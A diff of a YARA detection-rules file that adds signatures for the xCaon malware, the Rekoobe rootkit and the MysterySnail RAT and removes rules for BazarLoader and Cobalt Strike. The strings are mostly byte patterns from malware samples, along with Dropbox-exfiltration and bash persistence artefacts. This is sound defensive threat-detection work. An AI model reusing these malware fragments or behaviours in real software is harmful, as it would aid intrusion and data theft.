+		$s3 = "api.dropboxapi.com" fullword ascii
+		$s4 = { 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 00 00 00 22 00 00 00 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 20 3a 20 22 00 00 0d 00 0a 00 44 00 72 00 6f 00 70 00 62 00 6f 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 3a 00 20 00 7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 20 00 22 00 00 00 22 00 7d 00 0d 00 0a 00 00 00 00 00 7b 22 65 72 72 6f 72 5f 73 75 6d 6d 61 72 79 22 00 00 00 00 25 00 73 00 5c 00 25 00 73 00 00 00 7b 22 70 61 74 68 22 3a 20 22 25 73 22 }
+		$s5 = "C:\\Users\\Public\\%d\\" fullword ascii
+		$s6 = { 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 20 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 2c 00 22 00 61 00 75 00 74 00 6f 00 72 00 65 00 6e 00 61 00 6d 00 65 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 22 00 6d 00 75 00 74 00 65 00 22 00 3a 00 20 00 74 00 72 00 75 00 65 00 2c 00 22 00 73 00 74 00 72 00 69 00 63 00 74 00 5f 00 63 00 6f 00 6e 00 66 00 6c 00 69 00 63 00 74 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 7d 00 0d 00 0a 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2f 00 6f 00 63 00 74 00 65 00 74 00 2d 00 73 00 74 00 72 00 65 00 61 00 6d }
+		$s7 = { 25 73 2f [1-4] 2e 74 78 74 }
+		$s8 = { 25 73 2f [1-4] 2d 25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 2e 74 78 74 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $s* )
+}
+rule ARKBIRD_SOLG_Mal_Xcaon_Jul_2021_1 : FILE
+{
+	meta:
+		description = "Detect the xCaon malware"
+		author = "Arkbird_SOLG"
+		id = "bcd5a52d-9547-5709-95f4-9d1f956f623c"
+		date = "2021-07-01"
+		modified = "2021-07-02"
+		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_xCaon_Jul_2021_1.yara#L1-L21"
+		license_url = "N/A"
+		logic_hash = "9c3e3d0035596323a505404ecc067bd2b87a4b0ac7499f1c87aac015f59eb65a"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
+		hash2 = "e9013f35ce11fc4c5eb2c21827bdc459202d362365d6ea5b724dee4fe0088bd1"
+		hash3 = "489fca69a622195328302e64e29b6183feac90826dce198432d603202ca4d216"
+		tlp = "White"
+		adversary = "IndigoZebra"
+
+	strings:
+		$s1 = { a1 7c 10 41 00 33 c5 89 45 fc 8b 45 08 56 57 6a 49 89 85 f8 80 ff ff 58 6a 50 66 89 45 c8 58 6a 48 66 89 45 ca 58 6a 4c 66 89 45 cc 58 6a 50 66 89 45 ce 58 6a 41 66 89 45 d0 58 6a 50 66 89 45 d2 58 6a 49 66 89 45 d4 58 6a 2e 66 89 45 d6 58 6a 44 66 89 45 d8 58 66 89 45 da 6a 4c 58 66 89 45 dc 66 89 45 de 33 c0 66 89 45 e0 8d 45 c8 50 c7 45 e4 47 65 74 41 c7 45 e8 64 61 70 74 c7 45 ec 65 72 73 49 c7 45 f0 6e 66 6f 00 ff 15 50 d0 40 00 8d 4d e4 51 50 89 85 f4 80 ff ff ff 15 54 d0 40 00 8d 8d f0 80 ff ff 51 8d 8d fc 80 ff ff 51 c7 85 f0 80 ff ff 90 7e 00 00 ff d0 8b c8 33 c0 c6 45 f4 00 8d 7d f5 ab 66 ab aa 85 c9 0f 85 1d 01 00 00 53 6a 25 5e 6a 30 5a 6a 32 59 8b c6 66 89 45 8c 8b c2 66 89 45 8e 6a 58 8b c1 66 89 45 90 58 8b f8 6a 2d 66 89 7d 92 5f 8b df 66 89 5d 94 8b de 66 89 5d 96 8b da 66 89 5d 98 8b d9 66 89 5d 9a 8b d8 66 89 5d 9c 8b df 66 89 5d 9e 8b de 66 89 5d a0 8b da 66 89 5d a2 8b d9 66 89 5d a4 8b d8 66 89 5d a6 8b df 66 89 5d a8 8b de 66 89 5d aa 8b da 66 89 5d ac 8b d9 66 89 5d ae 8b d8 66 89 5d b0 8b df 66 89 5d b2 8b de 66 89 5d b4 8b da 66 89 5d b6 8b d9 66 89 45 c4 66 89 5d b8 8b d8 33 c0 66 89 45 c6 6a 06 8d 85 90 82 ff ff 50 8d 45 f4 50 66 89 5d ba 66 89 7d bc 66 89 75 be 66 89 55 c0 66 89 4d c2 e8 ?? 17 00 00 0f b6 45 f9 50 0f b6 45 f8 50 0f b6 45 f7 50 0f b6 45 f6 50 0f b6 45 f5 50 0f b6 45 f4 50 8d 45 8c 50 ff b5 f8 80 ff ff ff 15 44 d1 40 00 83 c4 2c 33 f6 46 5b ff b5 f4 80 ff ff ff 15 4c d0 40 00 8b }
+		$s2 = { 6a 5b 58 6a 55 66 89 45 c4 58 6a 70 66 89 45 c6 58 6a 6c 66 89 45 c8 58 6a 6f 66 89 45 ca 58 6a 61 66 89 45 cc 58 6a 64 66 89 45 ce 58 6a 5d 66 89 45 d0 58 6a 0d 66 89 45 d2 58 6a 0a 66 89 45 d4 58 6a 25 66 89 45 d6 33 c0 66 89 45 d8 58 6a 74 66 89 45 ac 8b c6 66 89 45 ae 58 6a 6d 66 89 45 b0 58 6a 70 66 89 45 b2 58 6a 25 66 89 45 b4 58 6a 64 66 89 45 b6 58 6a 2e 66 89 45 b8 58 6a 6c 66 89 45 ba 58 6a 6f 66 89 45 bc 58 6a 67 66 89 45 be 58 6a 46 66 89 45 c0 33 c0 66 89 45 c2 58 6a 69 66 89 45 dc 58 6a 6c 66 89 45 de 58 6a 65 66 89 45 e0 58 6a 3a 66 89 45 e2 58 66 89 45 e4 6a 25 58 66 89 45 e6 6a 0d 58 66 89 45 ea 6a 0a 58 66 89 45 ec 33 c0 66 89 45 ee 8d 45 c4 50 66 89 75 e8 e8 ?? 11 00 00 59 8d 4d c4 8d b5 50 f3 ff ff e8 [2] ff ff 89 bd 4c f2 ff ff c7 85 48 f3 ff ff 0f 00 00 00 89 bd 44 f3 ff ff c6 85 34 f3 ff ff 00 8d 85 34 f3 ff ff 50 83 ec 1c c6 45 fc 03 8d 85 fc f2 ff ff 8b f4 89 a5 50 f2 ff ff 50 e8 [2] ff ff e8 [2] ff ff 8b 9d 34 f3 ff ff 83 c4 20 83 bd 48 f3 ff ff 10 73 06 8d 9d 34 f3 ff ff 8d 85 4c f2 ff ff 50 }
+		$s3 = { 83 c4 10 8d 85 6c fb ff ff 50 68 04 01 00 00 ff 15 2c d0 40 00 33 c0 56 66 89 85 74 fd ff ff 8d 85 76 fd ff ff 53 50 e8 ?? 10 00 00 83 c4 0c ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 6c fb ff ff 50 8d 45 ac 50 8d 85 74 fd ff ff 50 ff d6 83 c4 10 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 74 fd ff ff 50 ff 15 24 d0 40 00 8b f8 83 ff ff 74 79 53 8d 85 50 f2 ff ff 50 ff b5 4c f2 ff ff 89 9d 50 f2 ff ff ff b5 48 f2 ff ff 57 ff 15 14 d0 40 00 57 ff 15 34 d0 40 00 33 c0 68 fe 07 00 00 66 89 85 6c f3 ff ff 8d 85 6e f3 ff ff 53 50 e8 ?? 10 00 00 8d 85 74 fd ff ff 50 8d 45 dc 50 8d 85 6c f3 ff ff 50 ff d6 8d 85 6c f3 ff ff 50 8d 85 18 f3 ff ff 50 8d 8d 50 f3 ff ff e8 [2] ff ff 83 }
+		$s4 = { 8b 45 08 33 ff 89 85 60 f1 ff ff 89 bd 5c f1 ff ff 33 c0 be 06 02 00 00 89 7d fc 56 66 89 85 88 fb ff ff 8d 85 8a fb ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 80 f9 ff ff 8d 85 82 f9 ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee bb 04 01 00 00 53 8d 85 88 fb ff ff 50 8d 45 e0 50 ff 15 00 d0 40 00 8d 85 80 f9 ff ff 50 53 ff 15 2c d0 40 00 6a 25 58 6a 73 5b 6a 63 66 89 45 c0 8b c3 66 89 45 c2 58 6a 63 66 89 45 c4 8b c3 66 89 45 c6 58 6a 6f 66 89 45 c8 58 6a 64 66 89 45 ca 58 6a 65 66 89 45 cc 58 66 89 45 ce 6a 25 58 6a 64 66 89 45 d0 58 6a 2e 66 89 45 d2 58 6a 6c 66 89 45 d4 58 6a 6f 66 89 45 d6 58 6a 67 66 89 45 d8 58 66 89 45 da 33 c0 68 fe 07 00 00 66 89 45 dc 66 89 85 80 f1 ff ff 8d 85 82 f1 ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 90 fd ff ff 8d 85 92 fd ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 25 58 6a 20 66 89 45 98 8b c3 66 89 45 9a 58 6a 2f 8b c8 66 89 4d 9c 59 6a 41 66 89 4d 9e 59 6a 2f 66 89 4d a0 8b c8 66 89 4d a2 59 6a 43 66 89 4d a4 59 66 89 4d a6 6a 22 8b c8 66 89 4d a8 59 6a 25 66 89 4d aa 59 66 89 4d ac 6a 22 8b cb 66 89 4d ae 59 66 89 4d b0 8b c8 6a 3e 66 89 4d b2 59 66 89 45 b6 6a 25 58 66 89 45 b8 33 c0 66 89 4d b4 66 89 5d ba 66 89 45 bc ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 80 f9 ff ff 50 8d 45 c0 50 8d 85 90 fd ff ff 50 ff d6 8b 45 0c 83 c4 10 83 7d 20 08 73 03 8d 45 0c 8d 8d 90 fd ff ff 51 50 8d 85 88 fb ff ff 50 8d 45 98 50 8d 85 80 f1 ff ff 50 ff d6 6a 44 5e 56 8d 85 04 f1 ff ff 57 50 e8 [2] 00 00 6a 10 8d 85 48 f1 ff ff 57 50 89 b5 04 f1 ff ff e8 [2] 00 00 83 c4 2c 8d 85 04 f1 ff ff 50 ff 15 28 d0 40 00 33 c0 66 89 85 34 f1 ff ff 8d 85 48 f1 ff ff 50 8d 85 04 f1 ff ff 50 57 57 6a 10 57 57 57 8d 85 80 f1 ff ff 33 db 50 43 57 89 9d 30 f1 ff ff ff 15 08 d0 40 00 68 3f 77 1b 00 ff b5 48 f1 ff ff 8b f0 ff 15 0c d0 40 00 3b f7 0f 84 1c 01 00 00 ff b5 4c f1 ff ff 8b 35 34 d0 40 00 ff d6 ff b5 48 f1 ff ff ff d6 33 c0 c7 85 78 f1 ff ff 07 00 00 00 89 bd 74 f1 ff ff 66 89 85 64 f1 ff ff 57 57 6a 03 57 57 68 00 00 00 80 8d 85 90 fd ff ff 50 88 5d fc ff 15 24 d0 40 00 89 85 5c f1 ff ff 83 f8 ff 0f 84 96 00 00 00 57 50 ff 15 04 d0 40 00 89 85 58 f1 ff ff 83 f8 ff 75 2b ff b5 5c f1 ff ff ff d6 8b 85 60 f1 ff ff 68 64 f1 40 00 e8 f1 00 00 00 53 33 ff 8d b5 64 f1 ff ff e8 64 03 00 00 e9 95 00 00 00 83 c0 02 50 e8 [2] 00 00 8b d8 8b 85 58 f1 ff ff 83 c0 02 50 57 53 e8 [2] 00 00 83 c4 10 57 8d 85 58 f1 ff ff 50 ff b5 58 f1 ff ff 53 ff b5 5c f1 ff ff ff 15 20 d0 40 00 ff b5 5c f1 ff ff ff d6 8d 85 64 f1 ff ff 50 53 e8 d9 11 00 00 53 e8 [2] 00 00 83 c4 0c 8d 85 90 fd ff ff 50 ff 15 38 d0 40 00 8b b5 60 f1 ff ff 8d 9d 64 f1 ff ff e8 96 00 00 00 6a 01 33 ff 8b }
+		$s5 = { be 06 02 00 00 89 ?? fc 56 66 89 85 ?? fb ff ff 8d 85 ?? fb ff ff ?? 50 e8 [2] 00 00 33 c0 56 66 89 85 ?? f9 ff ff 8d 85 ?? f9 ff ff ?? 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee ?? 04 01 00 00 ?? 8d 85 ?? fb ff ff 50 8d 45 e0 50 ff 15 00 [2] 00 8d 85 ?? f9 ff ff 50 ?? ff 15 [3] 00 }
+		$s6 = { 8b 45 08 [5] ff [5] 6a 07 89 85 10 ff ff ff ?? 33 ?? 33 c0 89 ?? 14 89 ?? 10 89 ?? 18 ff ff ff 66 89 ?? 8d ?? 1c 89 ?? fc 89 ?? 14 89 ?? 10 66 89 ?? 8d ?? 38 89 ?? 14 89 ?? 10 89 ?? 0c ff ff ff 66 89 ?? 89 ?? 6c 89 ?? 68 66 89 ?? 58 89 ?? 88 00 00 00 89 ?? 84 00 00 00 66 89 ?? 74 89 ?? b8 00 00 00 89 ?? b4 00 00 00 66 89 ?? a4 00 00 00 6a 68 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Bazarloader_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Rekoobe_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect BazarLoader implant"
+		description = "Detect the Rekoobe rootkit"
 		author = "Arkbird_SOLG"
-		id = "d6462e74-fe1d-599e-aac8-0d0942ca42ad"
-		date = "2021-10-30"
-		modified = "2021-10-30"
-		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_BazarLoader_Oct_2021_1.yara#L1-L17"
+		id = "a5b200f1-cbb7-5106-8127-74abd3cde061"
+		date = "2021-11-10"
+		modified = "2021-11-11"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-10/MAL_ELF_Rekoobe_Nov_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "afbe02ef9e69ac5105aaae28240d6863c9c4578c0e8fd7c86c38d975cf8acdc6"
+		logic_hash = "bde3d1a3d2d2e9efd4b7c68f69dce40d5e0f01d41885481730d8a7fa67cbab7e"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "0ba7554e7d120ce355c6995c6af95542499e4ec2f6012ed16b32a85175761a94"
-		hash2 = "2b29c80a4829d3dc816b99606aa5aeead3533d24137f79b5c9a8407957e97b10"
+		hash1 = "bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e"
+		hash2 = "e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94"
 		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 48 8b 44 24 60 c6 80 38 01 00 00 01 48 8b 44 24 60 c6 80 39 01 00 00 02 48 8b 44 24 60 c7 40 5c 03 00 00 00 b8 60 00 00 00 48 6b c0 00 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 01 00 00 00 48 8b 44 24 20 c7 40 08 02 00 00 00 48 8b 44 24 20 c7 40 0c 02 00 00 00 48 8b 44 24 20 c7 40 10 00 00 00 00 48 8b 44 24 20 c7 40 14 00 00 00 00 48 8b 44 24 20 c7 40 18 00 00 00 00 b8 60 00 00 00 48 6b c0 01 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 22 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 00 00 00 b8 60 00 00 00 48 6b c0 02 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 23 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 }
-		$s2 = { 48 8b 44 24 50 48 8b 00 c7 40 28 10 00 00 00 48 8b 44 24 50 48 8b 00 b9 04 00 00 00 48 6b c9 00 48 8b 54 24 50 8b 92 18 01 00 00 89 54 08 2c 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 4c 24 50 e8 80 f8 ff ff 48 8b 4c 24 50 e8 c6 fe ff ff 48 8b 44 24 50 83 78 78 00 76 16 48 8b 44 24 50 83 78 74 00 76 0b 48 8b 44 24 50 83 78 7c 00 7f 1e 48 8b 44 24 50 48 8b 00 c7 40 28 21 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 50 48 8b 4c 24 50 8b 40 74 0f af 41 7c 89 44 24 24 8b 44 24 24 89 44 24 34 8b 44 24 24 39 44 24 34 74 1e 48 8b 44 24 50 48 8b 00 c7 40 28 48 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 38 c7 40 18 00 00 00 00 48 8b 4c 24 50 e8 0c fc ff ff 48 8b 4c 24 38 88 41 1c 48 8b 44 24 38 48 c7 40 20 00 00 00 00 48 8b 44 24 38 48 c7 40 28 00 00 00 00 48 8b 44 24 50 0f b6 40 62 85 c0 74 0d 48 8b 44 }
-		$s3 = { 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d 82 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 38 48 8b 4c 24 58 8b 40 10 0f af 41 0c 48 8b 4c 24 58 48 63 49 04 48 8b 94 24 c0 00 00 00 48 8b 52 08 48 89 54 24 70 c6 44 24 20 00 4c 8b 44 24 58 45 8b 48 0c 44 8b c0 48 8b 44 24 38 48 8b 54 c8 70 48 8b 8c 24 c0 00 00 00 48 8b 44 24 70 ff 50 40 48 63 4c 24 30 48 89 84 cc 80 00 00 00 e9 5c ff ff ff 48 8b 44 24 38 8b 40 18 89 44 24 40 eb 0a 8b 44 24 40 ff c0 89 44 24 40 48 8b 44 24 38 8b 40 1c 39 44 24 40 0f 8d af 01 00 00 48 8b 44 24 38 8b 40 14 89 44 24 44 eb 0a 8b 44 24 44 ff c0 89 44 24 44 48 8b 84 24 c0 00 00 00 8b 80 88 01 00 00 39 44 24 44 0f 83 6e 01 00 00 c7 44 24 50 00 00 00 00 c7 44 24 30 00 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d e2 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 58 8b 4c 24 44 0f af 48 38 8b c1 89 44 24 60 c7 44 24 48 00 00 00 00 eb 0a 8b 44 24 48 ff c0 89 44 24 48 48 8b }
+		$s1 = { 00 ?? 19 00 00 00 48 85 c0 [2-6] bf 0a 00 00 00 e8 [2] 01 00 ?? 24 00 00 00 48 85 c0 [2-6] c6 00 48 c6 40 05 49 c6 40 01 49 c6 40 06 4c c6 40 02 53 c6 40 07 45 c6 40 03 54 c6 40 08 3d c6 40 04 46 c6 40 09 00 48 89 c7 e8 [2] 00 00 48 8d 54 24 0c }
+		$s2 = "GETCONF_DIR" ascii
+		$s3 = "/var/run/nscd/so/dev/ptmx" ascii
+		$s4 = { 45 78 65 63 53 74 61 72 74 3d 2f 62 69 6e 2f 62 61 73 68 20 2d 63 20 2f 75 73 72 2f 62 69 6e 2f 62 69 6f 73 65 74 64 }
+		$s5 = { 48 89 df e8 [3] ff 31 f6 48 89 df e8 [3] ff 48 8d 58 01 48 }
+		$s6 = { 2f 76 61 72 2f 74 6d 70 00 2f 76 61 72 2f 70 72 6f 66 69 6c 65 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 200KB and all of ( $s* )
+		uint32( 0 ) == 0x464C457F and filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Cobaltstrike_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Mysterysnail_RAT_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect Cobalt Strike implant"
+		description = "Detect MysterySnaial RAT implant"
 		author = "Arkbird_SOLG"
-		id = "89d46993-cc1b-536b-b1ab-a0e967d0d397"
-		date = "2021-10-30"
-		modified = "2021-10-30"
-		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_CobaltStrike_Oct_2021_1.yara#L1-L19"
+		id = "2fa5015a-144f-52f6-8a5f-28fce10861e3"
+		date = "2021-10-13"
+		modified = "2021-10-14"
+		reference = "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-14/MAL_MysterySnail_RAT_Oct_2021_1.yara#L1-L25"
 		license_url = "N/A"
-		logic_hash = "4f1a2306b8279be67829d0d515063caae6a9d7a07078a43c2cbe62f675bcb450"
-		score = 75
+		logic_hash = "bcf072fae02b479084b8d47b4cd676216f72aecfa4ebcf8226b6997839929b57"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "f520f97e3aa065efc4b7633735530a7ea341f3b332122921cb9257bf55147fb7"
-		hash2 = "7370c09d07b4695aa11e299a9c17007e9267e1578ce2753259c02a8cf27b18b6"
-		hash3 = "bfbc1c27a73c33e375eeea164dc876c23bca1fbc0051bb48d3ed3e50df6fa0e8"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "e84be291efadd53a8bb965bfb589590ffe870da9187e6752cc7a9f028053ff5d"
+		hash2 = "b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e"
+		hash3 = "73f520223a2e01c036a4b620c7188e733c113a429e25c5c3de7fbbc1c3d16ccc"
+		level = "experimental"
+		tlp = "White"
+		adversary = "MysterySnail"
 
 	strings:
-		$s1 = { 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 f2 73 17 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 f2 75 ef 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 f2 c3 }
-		$s2 = { 89 ?? 24 ?? 8b ?? 24 0c 89 ?? 24 ?? 8b ?? 24 ?? c1 ?? 0d 89 ?? 24 0c 48 8b ?? 24 10 89 ?? 24 [2] 8b ?? 24 10 }
-		$s3 = { b8 10 00 00 00 48 89 45 ?? e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 8b 55 f8 89 11 4c 8b 45 ?? 4c 8b 4d f0 4d 89 08 4c 8b 55 ?? 4c 8b 5d e8 4d 89 1a 48 8b 75 ?? 48 8b 7d e0 48 89 3e c7 00 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 8b 19 4d 8b 00 4d 8b 32 48 8b 0e 48 83 ec 20 4c 89 f2 41 89 d9 ff d0 48 83 c4 20 ?? 45 }
-		$s4 = { 48 83 ec 48 44 89 4c 24 44 4c 89 44 24 38 48 89 54 24 30 48 89 4c 24 28 c7 44 24 24 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 44 8b 4c 24 44 4c 8b 44 24 38 48 8b 54 24 30 48 8b 4c 24 28 ff d0 90 48 83 c4 }
+		$s1 = { 57 48 83 ec 20 4c 8b c2 33 f6 0f b6 d1 41 b1 01 8b c2 c1 e8 04 41 84 c1 75 53 4d 85 c0 74 47 41 0f b7 08 8d 41 bf 66 83 f8 19 76 0a 66 83 e9 61 66 83 f9 19 77 08 66 41 83 78 02 3a 74 03 44 8a ce 45 84 c9 49 8d 40 04 49 8b c8 48 0f 45 c8 66 39 31 74 19 66 83 39 5c 74 06 66 83 39 2f 75 06 66 39 71 02 74 07 bb 00 80 00 00 eb 05 bb 40 40 00 00 66 c1 e2 07 b8 80 00 00 00 66 f7 d2 66 23 d0 b8 00 01 00 00 66 0b d0 66 0b da 4d 85 c0 74 65 ba 2e 00 00 00 49 8b c8 e8 64 4b 01 00 48 8b f8 48 85 c0 74 50 48 8d 15 a9 0d 09 00 48 8b c8 e8 5d dd 00 00 85 c0 74 39 48 8d 15 a6 0d 09 00 48 8b cf e8 4a dd 00 00 85 c0 74 26 48 8d 15 a3 0d 09 00 48 8b cf e8 37 dd 00 00 85 c0 74 13 48 8d 15 a0 0d 09 00 48 8b cf e8 24 dd 00 00 85 c0 75 04 66 83 cb 40 48 8b 74 24 38 0f b7 c3 66 c1 e8 03 66 83 e0 38 66 0b d8 0f b7 c3 66 c1 e8 06 66 83 e0 07 66 0b c3 48 8b 5c 24 30 }
+		$s2 = { 4c 8d 0d 6e 96 09 00 48 89 44 24 20 44 8b c7 48 8d 15 a7 62 0d 00 48 8b ce e8 47 17 fb ff 85 c0 0f 8e 83 00 00 00 4c 8d 0d 48 96 09 00 44 8b c7 48 8d 15 36 59 0d 00 48 8b ce e8 26 17 fb ff 85 c0 7e 66 49 8b 46 10 8b 08 81 f9 0a 04 00 00 74 1b 81 f9 3f 04 00 00 74 13 81 f9 0b 04 00 00 44 8b c3 41 0f }
+		$s3 = { 25 2a 73 70 75 62 3a 0a }
+		$s4 = { 48 81 ec b0 02 00 00 48 8b 05 7a e9 7b 00 48 33 c4 48 89 84 24 a0 02 00 00 48 8b ea 48 8d 44 24 38 48 8d 15 c0 a1 79 00 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 c7 c1 01 00 00 80 ff 15 3d 94 71 00 85 c0 75 53 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 84 24 d0 01 00 00 c7 44 24 34 01 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 e6 a1 79 00 c7 44 24 30 c7 00 00 00 ff 15 00 94 71 00 85 c0 75 0e 8b 84 24 d0 01 00 00 89 45 68 85 c0 75 07 33 c0 e9 eb 00 00 00 83 f8 01 75 f4 33 d2 48 8d 4c 24 40 41 b8 90 01 00 00 e8 f0 82 6f 00 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 44 24 40 c7 44 24 30 c8 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 90 a1 79 00 ff 15 9a 93 71 00 85 c0 75 a8 33 f6 8b fe 8b de 66 83 7c 5c 40 3a 74 15 48 83 fb 64 74 94 ff c7 48 ff c3 48 83 fb 64 7c e7 33 c0 eb 77 48 63 c7 48 8d 4c 24 42 4c 89 b4 24 d0 02 00 00 4c 8d 34 00 49 03 ce e8 2f ad 6f 00 89 45 64 49 81 }
+		$s5 = { 48 8d 4c 24 60 ff 97 18 04 00 00 33 f6 c7 45 90 01 00 00 00 0f 57 c0 48 89 74 24 68 33 c9 66 0f 7f 44 24 70 48 89 75 80 48 89 75 88 c7 45 94 01 00 00 00 48 c7 45 9c 01 00 00 00 48 89 75 a8 e8 32 97 6f 00 8d 4e 01 48 89 45 b0 e8 26 97 6f 00 8d 4e 02 48 89 45 b8 e8 1a 97 6f 00 48 89 45 c0 45 33 c9 48 8d 45 d0 45 33 c0 48 89 44 24 48 48 8b d3 48 8d 44 24 60 33 c9 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 89 74 24 28 c7 44 24 20 01 00 00 00 ff 97 90 03 00 00 85 c0 74 0a 48 8b 4d d8 ff 15 da 8f 71 00 48 8b 4d d0 ff 15 d0 8f 71 00 b9 10 27 00 00 ff 15 b5 8f 71 00 0f 10 05 96 9c 79 00 48 8d 4d 08 33 d2 f2 0f 10 0d 98 9c 79 00 41 b8 b8 07 00 00 0f 29 45 f0 f2 0f 11 4d 